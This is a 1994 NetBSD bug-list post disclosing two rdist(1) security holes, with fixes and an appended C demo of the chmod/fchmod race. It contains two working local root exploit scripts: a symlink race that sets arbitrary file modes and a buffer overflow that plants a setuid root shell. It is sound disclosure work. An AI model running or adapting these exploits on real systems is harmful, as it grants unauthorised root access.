Subject: rdist(1) security bugs
To: None <netbsd-bugs@sun-lamp.cs.berkeley.edu>
From: Frank van der Linden <vdlinden@fwi.uva.nl>
List: netbsd-bugs
Date: 03/15/1994 22:38:52
Hi,

Below are a couple of scripts and comments from comp.security.misc
that demonstrate security bugs in rdist(1).
The original scripts were made by:
 	1991.9.14 -Tsutomu Shimomura, Los Alamos National Laboratory
 	tsutomu@no-sense.LANL.GOV.
I've been able to get the second script working.
(The second script has two very long lines, hope they survive).

Comments from Dave Hayes (dave@elxr.jpl.nasa.gov) in comp.security.misc:

>Here are the scripts I promised. Each checks for one of the RDIST holes.
>There are two fixes to this problem. 

>	1) Remove the setuid bit from rdist (chmod 711 rdist)
>	2) Obtain Rdist 6.1beta.3 via anonymous ftp from usc.edu (pub/rdist)

Comments from Casper Dik (casper@fwi.uva.nl) in comp.security.misc:

>The first script uses the gaping hole that does chown()/chmod on
>file names as root, instead of fchmod or fchown.
>
>The second one blows a buffer (4 times, each time one byte shorter).
>In doing so it overwrites the global variable ``userid'' that just
>happens to be next to it.   The trailing 0 from the 4 iterations
>zeros the userid variable.
>
>Both bugs can be fixed by adding one line at the beginning of the
>server routine:
>
>	setreuid(userid,userid);  or setuid(userid);
>
>
>There is no need for rdist -Server to run as root.
>
>Casper

#! /bin/sh
# GIMME - "gimme a file"
# Demonstrate rdist's ability to give me permission to access anything.
#
# gimme <pathname> [<permission> [<directory>]]
#	<pathname> is the target file.
#	<permission> is the octal mode to which the file access permission
#		should be set.  Note that this may not be effective unless
#		either the SUID (4000) or SGID (2000) bits are also requested.
#	<directory> is the target directory for rdist to use if a hard
#		link is desired.  Note that the user must have permission
#		to create this directory, it must be on the same filesystem
#		as the target file, and the target file must not be a
#		directory.  This option is necessary to change the ownership
#		of the target if chown() of a symbolic link modifies the
#		link itself, and not the file it refers to.
#

dirname=gimme$$
deftemp=/tmp
defperm=6777

if [ $1x = x ]; then
	echo "Usage: $0 <pathname> [<permission> [<directory>]]" >&2
	exit 1
fi

if [ $2x != x ]; then
	perm=$2
else
	perm=$defperm
fi

if [ $3x != x ]; then
	link="ln"
	temp=$3/$dirname
	target=$1
else
	link="ln -s"
	temp=$deftemp/$dirname
	case $1 in
	/*)
		target=$1
		;;
	*)
		target=`pwd`/$1
		;;
	esac
fi

trap "rm -fr $temp; exit 1"  1 2 15
umask 66
mkdir $temp; if [ $? != 0 ]; then
	exit 1
fi

set `whoami` $LOGNAME
user=$1
set daemon `groups`
while [ $# != 1 ]; do
	shift
done
group=$1

(
	# Protocol lines fed to the privileged server: 't' names the full
	# target, 'R' announces a regular file (options, mode, size, mtime,
	# owner, group, name).  The server then creates an rdistXXXXXX
	# temporary file in the target directory and waits for the data.
	echo "t$temp/something"
	echo "R0 $perm 1 0 $user $group "

	# Wait until the server has created its temporary file ...
	while [ ! -f $temp/rdist* ]; do
		sleep 1
	done

	# ... then swap it for a link to the real target before the server
	# chmod()s/chown()s that name as root (the first hole in Casper's
	# comment above).
	set $temp/rdist*
	rm -f $1
	if $link $target $1 >&2; then
		echo "" | dd bs=3 conv=sync 2>/dev/null
		echo ""

		echo 0 > $temp/status
	else
		echo 1 > $temp/status
	fi

	exit
) | rdist -Server

status=`cat $temp/status`
rm -fr $temp
exit $status
---------------------------CUT     HERE -------------------------------
#!/bin/sh
# Second hole: a long target name followed by four 'Q' (query) lines,
# each one byte shorter, overruns a buffer in the server so that the
# trailing 0 lands on the adjacent global ``userid'' and zeroes it (see
# Casper's comment above).  The 'S' (special) commands that follow are
# then run as the zeroed userid, i.e. root.
SUID=/tmp/foosh
cat <<_EOF_ > test 
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID 
_EOF_
cat test | /usr/ucb/rdist -Server localhost 
rm -rf test 
if [ -f $SUID ]; then 
  echo "$SUID is a  setuid shell. " 
fi 


------------------------------------------------------------------------------
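The following C program is an added illustration, not part of this mail or of rdist itself, of the first hole Casper describes: a privileged server that creates a temporary file and then applies the mode to the pathname can be redirected to any file by replacing that temporary file with a link (exactly what the gimme script does), whereas fchmod()/fchown() on the descriptor the server already holds act on the inode it created. The directory layout, file names and the 04755 mode are assumptions of the demo, and only chmod() is exercised so it runs as an ordinary user; chown() versus fchown() behaves the same way.

```c
#define _XOPEN_SOURCE 700
/*
 * Added illustration, not rdist's own code: chmod() on a pathname vs.
 * fchmod() on the descriptor the server already holds, after the client
 * has swapped the temp file for a symlink (the gimme script's "ln -s").
 * File names, directory layout and the 04755 mode are assumptions.
 */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define SETUID_MODE 04755           /* the mode the attacker asks for */

/* Permission bits of path (symlinks not followed), or (mode_t)-1. */
mode_t perm_bits(const char *path)
{
    struct stat st;
    if (lstat(path, &st) < 0)
        return (mode_t)-1;
    return st.st_mode & 07777;
}

/* Client side of the race: replace the server's temp file by a symlink
 * to the victim, as gimme does with "rm -f $1; ln -s $target $1". */
static int attacker_swap(const char *tmp, const char *victim)
{
    if (unlink(tmp) < 0)
        return -1;
    return symlink(victim, tmp);
}

/*
 * One simulated transfer.  use_fd == 0 reproduces the bug (chmod on the
 * name); use_fd != 0 is the fixed server (fchmod on the open fd).
 * Returns the victim file's permission bits afterwards, or (mode_t)-1
 * on a setup failure.  Everything lives under $TMPDIR or /tmp.
 */
mode_t simulate_transfer(int use_fd)
{
    const char *base = getenv("TMPDIR");
    char dir[128], victim[160], tmp[160];
    mode_t result = (mode_t)-1;
    int vfd = -1, fd = -1, rc = -1;

    snprintf(dir, sizeof dir, "%s/rdist-demo.XXXXXX", base ? base : "/tmp");
    if (mkdtemp(dir) == NULL)
        return result;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/rdistXXXXXX", dir);

    /* The file the attacker wants made setuid: plain 0644 to start. */
    vfd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (vfd < 0)
        goto out;
    close(vfd);

    /* Server: create the temp file and write the received data. */
    fd = open(tmp, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        goto out;
    if (write(fd, "payload\n", 8) != 8)
        goto out;

    /* The client wins the race before the server applies the mode. */
    if (attacker_swap(tmp, victim) < 0)
        goto out;

    if (use_fd)
        rc = fchmod(fd, SETUID_MODE);   /* the inode we created */
    else
        rc = chmod(tmp, SETUID_MODE);   /* follows the symlink: victim */
    if (rc < 0)
        goto out;

    result = perm_bits(victim);
out:
    if (fd >= 0)
        close(fd);
    unlink(tmp);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("chmod(name): victim mode %04o\n", (unsigned)simulate_transfer(0));
    printf("fchmod(fd) : victim mode %04o\n", (unsigned)simulate_transfer(1));
    return 0;
}
```

Compile with cc and run as any user: the chmod() variant leaves the victim at 4755, the fchmod() variant at 644. This closes only the race in Casper's first paragraph; his one-line fix, setuid(userid) before the server loop, takes root away from the server altogether and so also covers the overflow that the second script exercises.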